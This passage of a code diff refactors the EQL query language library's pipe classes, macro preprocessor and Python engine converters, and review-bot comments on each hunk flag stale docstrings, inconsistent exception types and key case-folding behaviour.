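Review bot: `Or.optimize` is a line-for-line copy of `And.optimize` from the previous hunk with the operator and result class swapped; a single helper on `BaseCompound` parameterised by the operator and the compound class would keep the two in step. The flattening loop also appears to assume that `current | term` returns at most one nested compound whose earlier terms are already reduced, so only the last term is kept "live" for further folding; a comment such as `# keep only the last term live so later operands can still fold into it` would make that assumption visible, since it is easy to break when editing `__or__`/`__and__`.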
@@ -879,161 +931,39 @@ def _render(self): # noinspection PyAbstractClass -class PipeCommand(EqlNode): +class PipeCommand(EqlNode, SignatureMixin): """Base class for an EQL pipe.""" __slots__ = 'arguments', - pipe_name = None # type: str + name = None # type: str lookup = {} # type: dict[str, PipeCommand|type] - minimum_args = None - maximum_args = None def __init__(self, arguments=None): # type: (list[Expression]) -> None """Create a pipe with optional arguments.""" self.arguments = arguments or [] super(PipeCommand, self).__init__() - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" - pass - @classmethod def register(cls, name): """Register a pipe class by name.""" def decorator(pipe_class): - pipe_class.pipe_name = name + pipe_class.name = name if name in cls.lookup: raise KeyError("Pipe {} already registered as {}".format(cls.lookup[name], name)) cls.lookup[name] = pipe_class return pipe_class return decorator - def _render(self): - if len(self.arguments) == 0: - return self.pipe_name - return self.pipe_name + ' ' + ', '.join(arg.render() for arg in self.arguments) - - -class ByPipe(PipeCommand): - """Pipe that takes a value (field, function, etc.) as a key.""" - - minimum_args = 1 - - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" - for i, arg in enumerate(self.arguments): - if isinstance(arg, Literal) or isinstance(arg, NamedSubquery): - return i - - -@PipeCommand.register('head') -class HeadPipe(PipeCommand): - """Node representing the head pipe, analogous to the unix head command.""" - - maximum_args = 1 - DEFAULT = 50 - - @property - def count(self): # type: () -> int - """Get the number of elements to emit.""" - if len(self.arguments) == 0: - return self.DEFAULT - return self.arguments[0].value - - def validate(self): - """Find the first invalid argument. 
Return None if all are valid.""" - if len(self.arguments) > 0: - arg = self.arguments[0] - if not (isinstance(arg, Literal) and isinstance(arg.value, int) and arg.value > 0): - return 0 - - -@PipeCommand.register('tail') -class TailPipe(PipeCommand): - """Node representing the tail pipe, analogous to the unix tail command.""" - - maximum_args = 1 - DEFAULT = 50 - - @property - def count(self): # type: () -> int - """Get the number of elements to emit.""" - if len(self.arguments) == 0: - return self.DEFAULT - return self.arguments[0].value + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Output a list of schemas for each event in the pipe.""" + return event_schemas - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" + def _render(self): if len(self.arguments) == 0: - return - elif len(self.arguments) > 1: - return 1 - else: - arg = self.arguments[0] - if not (isinstance(arg, Literal) and isinstance(arg.value, int)) or arg.value <= 0: - return 0 - - -@PipeCommand.register('sort') -class SortPipe(ByPipe): - """Sorts the pipes by field comparisons.""" - - -@PipeCommand.register('unique') -class UniquePipe(ByPipe): - """Filters events on a per-field basis, and only outputs the first event seen for a field.""" - - -@PipeCommand.register('count') -class CountPipe(ByPipe): - """Counts number of events that match a field, or total number of events if none specified.""" - - minimum_args = 0 - - -@PipeCommand.register('filter') -class FilterPipe(PipeCommand): - """Takes data coming into an existing pipe and filters it further.""" - - minimum_args = 1 - maximum_args = 1 - - @property - def expression(self): - """Get the filter expression.""" - return self.arguments[0] - - def validate(self): - """Validate that exactly one expression is sent.""" - if not isinstance(self.expression, Expression): - return 0 - - -@PipeCommand.register('unique_count') 
-@PipeCommand.register('ucount') -class UniqueCountPipe(ByPipe): - """Returns unique results but adds a count field.""" - - -@PipeCommand.register('window') -class WindowPipe(ByPipe): - """Maintains a time window buffer for streaming events.""" - - _timespan = None - - minimum_args = 1 - maximum_args = 1 - - @property - def timespan(self): - # cache timerange conversion - if not self._timespan: - self._timespan = TimeRange.convert(self.arguments[0]) - return self._timespan - - def validate(self): - if not self.timespan or self.timespan.delta < datetime.timedelta(0): - return 0 + return self.name + return self.name + ' ' + ', '.join(arg.render() for arg in self.arguments) class PipedQuery(EqlNode): @@ -1058,17 +988,15 @@ def _render(self): class EqlAnalytic(EqlNode): """Analytics are the top-level nodes for matching and returning events.""" - __slots__ = 'query', 'actions', 'metadata' + __slots__ = 'query', 'metadata' - def __init__(self, query, actions=None, metadata=None): + def __init__(self, query, metadata=None): """Init. :param PipedQuery query: Analytic query - :param list[str] actions: List of actions for the query :param dict metadata: Metadata for the analytic """ self.query = query - self.actions = actions self.metadata = metadata or {} @property @@ -1081,16 +1009,16 @@ def name(self): """Return the name from metadata.""" return self.metadata.get('name') - def __str__(self): + def __unicode__(self): """Print a string instead of the dictionary that render returns.""" - return self.__repr__() + return self.query.__unicode__() - def __unicode__(self): + def __str__(self): """Print a string instead of the dictionary that render returns.""" - return self.__repr__() + return self.query.__str__() def _render(self): - return {'metadata': self.metadata, 'actions': self.actions, 'query': self.query.render()} + return {'metadata': self.metadata, 'query': self.query.render()} class Definition(object): 
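Review bot: The new `PipeCommand.output_schemas` docstring, "Output a list of schemas for each event in the pipe", does not say what the base implementation does; since it returns `event_schemas` unchanged, `"""Return the schemas of the events leaving this pipe; the default passes the input schemas through unchanged."""` tells subclass authors when they must override it. The hunk also drops `validate`, `minimum_args` and `maximum_args` in favour of `SignatureMixin`, which I cannot see from here — a class-level comment pointing at where argument validation now lives would help anyone reading this file in isolation. The `lookup` type comment could also be updated to `dict[str, type]` now that only classes are registered through `register`.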
@@ -1122,7 +1050,7 @@ def __init__(self, name, value): # type: (str, Literal) -> None class BaseMacro(Definition): """Base macro class.""" - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Expand a macro with a set of arguments.""" raise NotImplementedError @@ -1134,17 +1062,15 @@ def __init__(self, name, callback): """Python macro to allow for more dynamic or sophisticated macros. :param str name: The name of the macro. - :param (list[EqlNode], AstWalker) -> EqlNode callback: A callback to expand out the macro. + :param (list[EqlNode]) -> EqlNode callback: A callback to expand out the macro. """ super(CustomMacro, self).__init__(name) self.callback = callback - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Make the callback do the dirty work for expanding the AST.""" - node = self.callback(arguments, walker) - if optimize: - return node.optimize() - return node + node = self.callback(arguments) + return node.optimize() @classmethod def from_name(cls, name): @@ -1168,15 +1094,16 @@ def __init__(self, name, parameters, expression): :param list[str]: The names of the parameters. :param Expression expression: The parameterized expression to return. """ - super(Macro, self).__init__(name) + BaseMacro.__init__(self, name) + EqlNode.__init__(self) self.parameters = parameters self.expression = expression - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Expand a node. :param list[BaseNode node] arguments: The arguments the macro is called with - :param AstWalker walker: An optional syntax tree walker. + :param Walker walker: An optional syntax tree walker. :param bool optimize: Return an optimized copy of the AST :rtype: BaseNode """ 
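Review bot: `Macro.expand`'s docstring still documents `:param Walker walker:` and `:param bool optimize:` although this hunk removes both parameters from the signature (the `AstWalker` → `Walker` rename was applied to a line that should have been deleted); remove both lines so the docstring matches `expand(self, arguments)`. `Macro.__init__` now calls `BaseMacro.__init__(self, name)` and `EqlNode.__init__(self)` explicitly instead of `super()`, presumably because of the dual inheritance; a one-line comment saying so would stop a future cleanup from reverting it. The same stale-parameter issue appears in `PreProcessor.expand` in the `@@ -1232` hunk.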
@@ -1185,17 +1112,15 @@ def expand(self, arguments, walker=None, optimize=True): self.name, len(self.parameters), len(arguments))) lookup = dict(zip(self.parameters, arguments)) - walker = walker or AstWalker() - def expand_variables(node, _): - """Callback for walking the AST that expands the variables into the passed in expression.""" - if isinstance(node, Field): - if node.base in lookup and not node.path: - node = walker.copy(lookup[node.base]) + def _walk_field(node): + if node.base in lookup and not node.path: + return lookup[node.base].optimize() return node - expanded = walker.transform(self.expression, expand_variables, optimize=optimize) - return expanded + walker = RecursiveWalker() + walker.register_func(Field, _walk_field) + return walker.walk(self.expression).optimize() def _render(self): expr = self.expression.render() 
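Review bot: `_walk_field` substitutes `lookup[node.base].optimize()` directly, whereas the removed code inserted `walker.copy(...)` of the argument; if `optimize()` can return the argument node itself (a `Field` or literal with nothing to fold), a parameter used more than once in the macro body now produces a tree in which the same node object appears at several positions. That aliasing is harmless for read-only walks but would surprise any later in-place mutation, so either document that expanded trees may share nodes or copy the argument before returning it. `_walk_field` also needs a docstring, e.g. `"""Replace a bare parameter name with the (optimized) argument the macro was called with."""`.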
@@ -1205,14 +1130,33 @@ def _render(self): return super(Macro, self)._render() -class PreProcessor(object): +class PreProcessor(ParserConfig): """An EQL preprocessor stores definitions and is used for macro expansion and constants.""" def __init__(self, definitions=None): """Initialize a preprocessor environment that can load definitions.""" - self.walker = AstWalker() self.constants = OrderedDict() # type: dict[str, Constant] - self.macros = OrderedDict() # type: dict[str, BaseMacro] + self.macros = OrderedDict() # type: dict[str, BaseMacro|CustomMacro|Maco] + + class PreProcessorWalker(RecursiveWalker): + """Custom walker class for this preprocessor.""" + + preprocessor = self + + def _walk_field(self, node, *args, **kwargs): + if node.base in self.preprocessor.constants and not node.path: + return self.preprocessor.constants[node.base].value + return self._walk_base_node(node, *args, **kwargs) + + def _walk_function_call(self, node, *args, **kwargs): + if node.name in self.preprocessor.macros: + macro = self.preprocessor.macros[node.name] + arguments = [self.walk(arg, *args, **kwargs) for arg in node.arguments] + return macro.expand(arguments) + return self._walk_base_node(node, *args, **kwargs) + + self.walker_cls = PreProcessorWalker + ParserConfig.__init__(self, preprocessor=self) self.add_definitions(definitions or []) def add_definitions(self, definitions): @@ -1220,7 +1164,7 @@ def add_definitions(self, definitions): for definition in definitions: self.add_definition(definition) - def add_definition(self, definition): # type: (Definition) -> None + def add_definition(self, definition): # type: (BaseMacro|Constant) -> None """Add a named definition to the preprocessor.""" name = definition.name if isinstance(definition, BaseMacro): 
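Review bot: The type comment `dict[str, BaseMacro|CustomMacro|Maco]` misspells `Macro`; since both concrete classes derive from `BaseMacro` the comment can simply stay `# type: dict[str, BaseMacro]`. The nested `PreProcessorWalker` class is created anew for every `PreProcessor` and stores `preprocessor = self` as a class attribute, which forms a reference cycle (instance → `walker_cls` → instance); handing the preprocessor to the walker's constructor, or setting it as an instance attribute in `expand`, avoids both the cycle and the per-instance class. `_walk_function_call` also returns `macro.expand(arguments)` without walking the expansion, so constants or macros referenced inside a macro body may stay unexpanded unless `macro.expand` handles that itself — I cannot confirm from this hunk.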
@@ -1232,27 +1176,17 @@ def add_definition(self, definition): # type: (Definition) -> None raise KeyError("Constant {} already defined".format(name)) self.constants[name] = definition - def expand(self, root, optimize=True): + def expand(self, root): """Expand the function calls that match registered macros. :param EqlNode root: The input node, macro, expression, etc. :param bool optimize: Toggle AST optimizations while expanding :rtype: EqlNode """ - if not optimize and not self.constants and not self.macros: + if not self.constants and not self.macros: return root - def expand_callback(node, _): - if isinstance(node, FunctionCall): - if node.name in self.macros: - macro = self.macros[node.name] - expanded = macro.expand(node.arguments, self.walker, optimize=optimize) - node = expanded - elif isinstance(node, Field) and not node.path: - if node.base in self.constants: - node = self.constants[node.base].value - return node - return self.walker.transform(root, expand_callback, optimize=optimize) + return self.walker_cls().walk(root) def copy(self): """Create a shallow copy of a preprocessor.""" @@ -1260,3 +1194,7 @@ def copy(self): preprocessor.constants.update(self.constants) preprocessor.macros.update(self.macros) return preprocessor + + +# circular dependency +from .walkers import Walker, RecursiveWalker # noqa: E402 diff --git a/eql/engines/build.py b/eql/build.py similarity index 91% rename from eql/engines/build.py rename to eql/build.py index e04a16d..20baeb6 100644 --- a/eql/engines/build.py +++ b/eql/build.py 
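Review bot: `PreProcessor.expand`'s docstring still lists `:param bool optimize:` although the hunk removes that parameter; delete the line. The early return `if not self.constants and not self.macros: return root` hands back the caller's own node while the walker path presumably builds a fresh tree, so callers that mutate the result get the original in one case and a copy in the other; a sentence in the docstring (`The input node may be returned unchanged when there is nothing to expand.`) makes that contract explicit.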
@@ -1,11 +1,11 @@ """Entry point to project.""" -from __future__ import print_function +from __future__ import print_function, unicode_literals -from eql.ast import EqlAnalytic, PipedQuery -from eql.engines.native import PythonEngine -from eql.engines.base import TextEngine -from eql.parser import parse_analytic, parse_query -from eql.utils import is_string +from .ast import EqlAnalytic, PipedQuery +from .engine import PythonEngine +from .transpilers import TextEngine +from .parser import parse_analytic, parse_query +from .utils import is_string, load_extensions def render_engine(analytics, engine_type, config=None, analytics_only=False): @@ -17,6 +17,9 @@ def render_engine(analytics, engine_type, config=None, analytics_only=False): :param boolean analytics_only: Render the analytics without the core engine code. :return str: Returns the base engine """ + load_extensions(force=False) + if engine_type not in TextEngine.extensions: + raise KeyError("Unable to translate to unknown extension {}.".format(engine_type)) engine_cls = TextEngine.extensions[engine_type] engine = engine_cls(config) diff --git a/eql/engines/native.py b/eql/engine.py similarity index 79% rename from eql/engines/native.py rename to eql/engine.py index 7cdca45..b89ccca 100644 --- a/eql/engines/native.py +++ b/eql/engine.py 
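Review bot: The new guard in `render_engine` raises `KeyError`, which Python renders with its message wrapped in quotes (`str(KeyError("msg"))` is `"'msg'"`), so the otherwise friendly text prints like a dictionary key and is indistinguishable from a genuine lookup failure; a `ValueError`, or the `EqlCompileError` that `eql/__init__.py` exports in this same patch, would read cleanly. `load_extensions(force=False)` is a side effect hidden inside a render function — a comment stating where extensions are discovered and that they are imported before the `TextEngine.extensions` lookup would make the behaviour reviewable, since the transpiler that ends up handling `engine_type` is decided by whatever that call loads.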
@@ -2,13 +2,16 @@ from __future__ import print_function import json -import re +import functools from collections import defaultdict, deque, OrderedDict, namedtuple -from eql.ast import * # noqa -from eql.engines.base import BaseEngine, BaseTranspiler, NodeMethods, Event, AnalyticOutput -from eql.schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC -from eql.utils import is_string, is_number, get_type_converter, to_unicode +from .ast import * # noqa: F403 +from .errors import EqlCompileError +from .pipes import * # noqa: F403 +from .transpilers import BaseEngine, BaseTranspiler +from .events import Event, AnalyticOutput +from .schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC +from .utils import is_string, is_array, is_number, get_type_converter PIPE_EOF = object() @@ -33,11 +36,6 @@ def call(self, fn, *args): class PythonEngine(BaseEngine, BaseTranspiler): """Converter from EQL to Python callbacks.""" - converters = NodeMethods() - pipes = NodeMethods() - reducers = NodeMethods() - special_functions = NodeMethods() - def __init__(self, config=None): """Create a python engine for EQL.""" super(PythonEngine, self).__init__(config) 
@@ -56,37 +54,14 @@ def __init__(self, config=None): if self.get_config('data_source') == 'endgame': self.process_subtype = "opcode" - self.create_values = (1, 3) + self.create_values = (1, 3, 9) self.terminate_values = (2, 4) else: self.process_subtype = "subtype" - self.create_values = ["create"] + self.create_values = ["create", "fork"] self.terminate_values = ["terminate"] - self.add_custom_function('length', self._length) - self.add_custom_function('arrayContains', self._array_contains) - self.add_custom_function('safe', self._convert_safe_callback) - - # String functions - self.add_custom_function('match', self._match) - self.add_custom_function('matchLite', self._match) - self.add_custom_function('startsWith', self._str_starts_with) - self.add_custom_function('endsWith', self._str_ends_width) - self.add_custom_function('stringContains', self._str_contains) - self.add_custom_function('indexOf', self._str_index_of) - self.add_custom_function('substring', self._str_substring) - self.add_custom_function('string', to_unicode) - self.add_custom_function('concat', self._concat) - self.add_custom_function('number', self._number) - - # Math functions - self.add_custom_function('add', self._add) - self.add_custom_function('subtract', self._subtract) - self.add_custom_function('multiply', self._multiply) - self.add_custom_function('divide', self._divide) - self.add_custom_function('modulo', self._modulo) - - self._scoped = list() + self._scoped = [] for name, fn in self.get_config('functions', {}).items(): self.add_custom_function(name, fn) 
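Review bot: `self.create_values = (1, 3, 9)` and `["create", "fork"]` add new magic values with no explanation; a reader cannot tell what opcode `9` denotes or why `fork` is treated as process creation. A comment beside each, such as `# opcode 9: <event name from the endgame data-source documentation>` and `# fork: <reason it counts as a create>`, would keep these lists reviewable, and a short test that an event with the new values is classified as a create would pin the behaviour. The `self._scoped = list()` → `[]` change and the removal of the built-in function table (now presumably in `.functions`) are fine.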
@@ -101,100 +76,6 @@ def __init__(self, config=None): else: self._default_emitter = self.get_result_emitter() - @staticmethod - def _length(value): - if value is None: - return 0 - else: - return len(value) - - @staticmethod - def _match(pattern, value): - return value is not None and re.match(pattern, value, re.IGNORECASE) is not None - - @staticmethod - def _str_starts_with(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and a.lower().startswith(b.lower()) - - @staticmethod - def _str_ends_width(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and a.lower().endswith(b.lower()) - - @staticmethod - def _str_contains(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and b.lower() in a.lower() - - @staticmethod - def _str_index_of(a, b, start=0): # type: (str, str, int) -> int - if is_string(a) and is_string(b): - a = a.lower() - b = b.lower() - if b in a[start:]: - return a.index(b, start) - - @staticmethod - def _add(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) + (b or 0) - - @staticmethod - def _subtract(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) - (b or 0) - - @staticmethod - def _divide(a, b): # type: (int|float, int|float) -> (int|float) - if not b: - return float('NaN') - return (a or 0) / b - - @staticmethod - def _multiply(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) * (b or 0) - - @staticmethod - def _modulo(a, b): # type: (int|float, int|float) -> (int|float) - if not b: - return float('NaN') - return (a or 0) % b - - @staticmethod - def _str_substring(a, start=None, end=None): # type: (str, int, int) -> str - if is_string(a): - return a[start:end] - - @staticmethod - def _concat(*args): - return u"".join(to_unicode(arg) for arg in args) - - @staticmethod - def _number(arg, base=10): # type: (str, int) -> int|float - if is_number(arg): - return arg - elif is_string(arg): - if '.' 
in arg: - return float(arg) - if arg.startswith('0x'): - arg = arg[2:] - base = 16 - try: - return int(arg, base) - except ValueError: - return None - - @staticmethod - def _array_contains(array, value): - if array is None: - return False - - if is_string(value): - value = value.lower() - - for item in array: - if item == value: - return True - elif is_string(item) and item.lower() == value: - return True - return False - def print_event(self, event): # type: (Event) -> None """Print an event to stdout.""" print(json.dumps(event.data, sort_keys=True)) @@ -240,7 +121,7 @@ def output_results(events): # type: (list[Event]) -> None else: return output_results - def convert(self, node, piped=False, scoped=False): + def convert(self, node, *args, **kwargs): """Convert an eql AST to a python callback function. :param EqlNode node: The eql AST @@ -249,21 +130,40 @@ def convert(self, node, piped=False, scoped=False): :return A python callback function that takes an event. :rtype: (Event|Scope|list[Event]) -> object """ - cb = PythonEngine.converters(self, node) + piped = kwargs.pop("piped", False) + scoped = kwargs.pop("scoped", False) + method = self.get_node_method(node, "_convert_") + + if not method: + raise EqlCompileError(u"Unable to convert {}".format(node)) + + cb = method(node, *args, **kwargs) + if not scoped: return cb elif piped: + @functools.wraps(cb) def wrapped(events): return cb(Scope(events, [])) return wrapped else: + @functools.wraps(cb) def wrapped(event): return cb(Scope([event], [])) return wrapped - def _convert_key(self, args, scoped=True, piped=False): + @classmethod + def _remove_case(cls, key): + if is_string(key): + return key.lower() + elif is_array(key): + return tuple(cls._remove_case(k) for k in key) + else: + return key + + def _convert_key(self, args, scoped=True, piped=False, insensitive=True): """Convert a tuple of AST nodes to a callback function that returns a key. :param list[Event] args: 
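Review bot: `_remove_case` has no docstring, and its asymmetric behaviour (strings lowered, arrays recursed into and returned as tuples, everything else untouched) matters to every grouping key it feeds: `"""Normalise a key for case-insensitive comparison: lower-case strings, recurse into arrays (returned as tuples so the key stays hashable), leave other values unchanged."""`. In `convert`, the `piped` and `scoped` flags moved from named parameters into `**kwargs`, which removes them from the signature and `help()`; the docstring should list them as accepted keyword arguments, e.g. `:param bool piped: The callback receives a list of events` and `:param bool scoped: Wrap the callback so it receives a Scope`. The `EqlCompileError` for an unconvertible node is a good addition and `convert_reducer` in the next hunk should mirror it.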
@@ -271,18 +171,23 @@ def _convert_key(self, args, scoped=True, piped=False): :param bool scoped: Wrap the callback with variable scoping :rtype: (Scope|Event|list[Event]) -> tuple[object] """ + remove_case = self._remove_case + if len(args) == 0: return lambda e: None elif len(args) == 1: - return self.convert(args[0], scoped=scoped, piped=piped) + callback = self.convert(args[0], scoped=scoped, piped=piped) + if insensitive: + return lambda e: remove_case(callback(e)) + return callback callbacks = [self.convert(arg, scoped=scoped, piped=piped) for arg in args] - def to_tuple_callback(value): - return tuple(callback(value) for callback in callbacks) - - return to_tuple_callback + if insensitive: + return lambda e: tuple(remove_case(cb(e)) for cb in callbacks) + else: + return lambda e: tuple(cb(e) for cb in callbacks) def _convert_tuple(self, args): """Convert a tuple of AST nodes to a callback function that returns a tuple of values. @@ -308,7 +213,7 @@ def convert_pipe(self, node, next_pipe): :param (list[eql.engines.base.Event]) -> None next_pipe: An already converted pipe :rtype: (list[eql.engines.base.Event]) -> None """ - return self.pipes(self, node, next_pipe) + return self.convert(node, next_pipe) def convert_reducer(self, node, next_pipe): """Convert an EQL reducer into a callback function. @@ -317,10 +222,10 @@ def convert_reducer(self, node, next_pipe): :param (list[eql.engines.base.Event]) -> None next_pipe: An already converted reducer :rtype: (list[eql.engines.base.Event]) -> None """ - return self.reducers(self, node, next_pipe) + method = self.get_node_method(node, "_reduce_") or self.get_node_method(node, "_convert_") + return method(node, next_pipe) - @converters.add(Not) - def _negate(self, node): # type: (Not) -> callable + def _convert_not(self, node): # type: (Not) -> callable get_value = self.convert(node.term) def negate(scope): # type: (Scope) -> bool 
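Review bot: `_convert_key` gains `insensitive=True` as its default, so every existing caller that passes only `scoped`/`piped` now silently case-folds string keys and merges values that differed only by case into one bucket; if that is the intended new semantics for the grouping pipes it should be documented in the docstring (`:param bool insensitive: Lower-case string keys, and strings inside array keys, so grouping is case-insensitive`) and in the changelog, otherwise the default should be `False` with pipes opting in. The `lambda e: remove_case(callback(e))` wrappers also hide the wrapped callback's name, whereas `convert` in the previous hunk uses `functools.wraps` for exactly that reason.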
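Review bot: `convert_reducer` falls back from `_reduce_` to `_convert_` but never checks that either lookup succeeded, so an unsupported node fails with `TypeError: 'NoneType' object is not callable` instead of the `EqlCompileError("Unable to convert ...")` that `convert` raises for the same situation. Add `if not method: raise EqlCompileError(u"Unable to reduce {}".format(node))` before `return method(node, next_pipe)` so both entry points report unsupported nodes the same way.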
@@ -328,24 +233,22 @@ def negate(scope): # type: (Scope) -> bool return negate - @converters.add(Literal) - @converters.add(String) - @converters.add(Boolean) - @converters.add(Null) - @converters.add(Number) - def _get_value(self, node): # type: (Literal) -> callable + def _convert_literal(self, node): # type: (Literal) -> callable literal_value = node.value return lambda scope: literal_value - @converters.add(Field) - def _get_field(self, node): # type: (Field) -> callable + def _convert_field(self, node): # type: (Field) -> callable def walk_path(value): for key in node.path: if value is None: break + elif is_string(value) and is_string(key): + # expand subtype.create -> subtype == "create" + # if there's a string field called "subtype" + value = (value == key) elif isinstance(value, dict): value = value.get(key) - elif key < len(value): + elif isinstance(key, int) and is_array(value) and key < len(value): value = value[key] else: return @@ -381,15 +284,11 @@ def query_event_callback(scope): # type: (Scope) -> object return query_event_callback - @staticmethod - def _is_name(node): # type: (EqlNode) -> bool - return isinstance(node, Field) and not node.path - def _create_custom_callback(self, arguments, body): """Convert an EQL callback with named arguments. :param list[Field] arguments: List of named arguments for the callback function - :param Expression arguments: List of named arguments for the callback function + :param Expression body: List of named arguments for the callback function :rtype: (Scope, object) -> object """ names = [arg.base for arg in arguments] 
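Review bot: The corrected `:param Expression body:` line in `_create_custom_callback`'s docstring still carries the description copied from `arguments` ("List of named arguments for the callback function"), so the fix changed the parameter name but not the wrong text. From the visible `names = [arg.base for arg in arguments]`, `body` is the expression evaluated with those names bound; suggest `:param Expression body: The expression evaluated with *arguments* bound as named variables`. The remainder of the function is outside this hunk, so adjust the wording if the binding is done differently there.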
@@ -401,39 +300,38 @@ def _create_custom_callback(self, arguments, body): return callback - @special_functions.add('safe') - def _convert_safe_callback(self, arguments): + def _function_safe(self, arguments): get_value = self.convert(arguments[0]) def callback(scope): try: return get_value(scope) - except: + except Exception: pass return callback - @special_functions.add('wildcard') - def _convert_wildcard(self, arguments): - patterns = [] - for literal in arguments[1:]: - regex = re.escape(literal.value.lower()) - regex = "^" + regex.replace('\\*', '.*?') + "$" - patterns.append(regex) - - compound = re.compile('|'.join(patterns), re.I) - get_source = self.convert(arguments[0]) - - def check_match(scope): - text = get_source(scope) - return text is not None and compound.match(text) is not None + def _function_array_count(self, arguments): + node = FunctionCall('arrayCount', arguments) + if len(arguments) == 3 and self.is_variable(arguments[1]): + array, name, body = arguments + get_array = self.convert(array) + callback = self._create_custom_callback([name], body) - return check_match + def walk_array(scope): # type: (Scope) -> bool + array = get_array(scope) + count = 0 + if isinstance(array, list): + for item in array: + if scope.call(callback, item): + count = count + 1 + return count + return walk_array + raise TypeError(u"Invalid signature {}".format(node)) - @special_functions.add('arraySearch') - def _convert_array_search(self, arguments): + def _function_array_search(self, arguments): node = FunctionCall('arraySearch', arguments) - if len(arguments) == 3 and self._is_name(arguments[1]): + if len(arguments) == 3 and self.is_variable(arguments[1]): array, name, body = arguments get_array = self.convert(array) callback = self._create_custom_callback([name], body) 
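Review bot: `_function_array_count` and `_function_array_search` have no docstrings, and the signature contract they share (`len(arguments) == 3 and self.is_variable(arguments[1])`, otherwise `TypeError`) is exactly what a reader needs spelled out. Suggest `"""Count the items of arrayCount(array, name, body) for which *body* is truthy with *name* bound to the item; 0 if the value is not a list."""` on the first, with matching "True for the first matching item" wording on the second. Inside `walk_array`, `count = count + 1` reads better as `count += 1`. `_function_safe`'s handler falls through to an implicit `None`; `except Exception:` / `return None` would make the intended result explicit rather than a by-product of `pass`.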
@@ -445,18 +343,25 @@ def walk_array(scope): # type: (Scope) -> bool if scope.call(callback, item): return True return False - return walk_array raise TypeError(u"Invalid signature {}".format(node)) - @converters.add(FunctionCall) - def _get_function_call(self, node): # type: (FunctionCall) -> callable + def _convert_function_call(self, node): # type: (FunctionCall) -> callable name = node.name - if name in self.special_functions: - unbound = self.special_functions[node.name] - return unbound(self, node.arguments) + method = getattr(self, "_function_{}".format(self.camelized(name)), None) + if method: + return method(node.arguments) + + # if a function isn't found, pull a specific callback in from the function registry + func = self._functions.get(node.name, node.signature) + + # if it's a function signature, then get the methods + if hasattr(func, "get_callback"): + func = func.get_callback(*node.arguments) + + if not callable(func): + raise KeyError("Unknown function {}".format(node.name)) - func = self._functions[node.name] get_arguments = self._convert_tuple(node.arguments) def wrapped_function(scope): # type: (Scope) -> bool @@ -464,8 +369,7 @@ def wrapped_function(scope): # type: (Scope) -> bool return wrapped_function - @converters.add(InSet) - def _check_in_set(self, node): # type: (InSet) -> callable + def _convert_in_set(self, node): # type: (InSet) -> callable if all(isinstance(item, Literal) for item in node.container): values = set() for item in node.container: @@ -488,8 +392,7 @@ def callback(scope): # type: (Scope) -> bool else: return self.convert(node.synonym) - @converters.add(Comparison) - def _compare(self, node): # type: (Comparison) -> callable + def _convert_comparison(self, node): # type: (Comparison) -> callable get_left = self.convert(node.left) get_right = self.convert(node.right) 
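Review bot: An unknown function in `_convert_function_call` raises `KeyError("Unknown function ...")`, while `convert` in this same change raises `EqlCompileError` for an unconvertible node, so callers compiling a query see two exception types for the same class of problem. Suggest `raise EqlCompileError(u"Unknown function {}".format(node.name))`. The `getattr(self, "_function_{}".format(self.camelized(name)), None)` lookup resolves a name taken from the query text to an engine method; the fixed `_function_` prefix is what keeps that from reaching other attributes, so a comment such as `# prefix-bound lookup: only _function_* helpers are reachable from query text` would record why the prefix must not be made configurable.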
@@ -536,7 +439,6 @@ def callback(scope): # type: (Scope) -> bool return callback - @converters.add(And) def _convert_and(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] @@ -545,7 +447,6 @@ def and_terms(scope): # type: (Scope) -> bool return and_terms - @converters.add(Or) def _convert_or(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] 
@@ -554,51 +455,80 @@ def or_terms(scope): # type: (Scope) -> bool return or_terms - @pipes.add(CountPipe) def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable + host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - summary = {'count': 0} + summary = {'key': 'totals', 'count': 0} + + # mutable scoped variable + hosts = [set()] def count_total_callback(events): if events is PIPE_EOF: - # event must be immutable, as the counter will be reset - event = {'key': 'totals', 'count': summary['count']} + # immutable version of summary + event = summary.copy() + + if len(hosts[0]): + event['total_hosts'] = len(hosts[0]) + event['hosts'] = list(sorted(hosts[0])) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) - summary['count'] = 0 next_pipe(PIPE_EOF) + + # reset state + summary['count'] = 0 + if len(hosts[0]): + del summary['hosts'] + del summary['total_hosts'] + hosts[0] = set() else: summary['count'] += 1 + if host_key in events[0].data: + hosts[0].add(events[0].data[host_key]) return count_total_callback else: - get_key = self._convert_key(node.arguments, scoped=True, piped=True) - count_table = defaultdict(lambda: {'count': 0}) + get_key = self._convert_key(node.arguments, scoped=True, piped=True, insensitive=False) + # we want to aggregate counts for keys insensitively, but need to keep the case of the first one we see + key_lookup = {} + count_table = defaultdict(lambda: {'count': 0, 'hosts': set()}) + remove_case = self._remove_case def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: # This may seem a little tricky, but we need to effectively learn the type(s) to perform comparison # Python 3 doesn't allow you to use a key function that returns various types - converter = get_type_converter(count_table) - converted_count_table = {converter(k): v for k, v in count_table.items()} - total = sum(tbl['count'] for tbl in count_table.values()) + case_sensitive_table = 
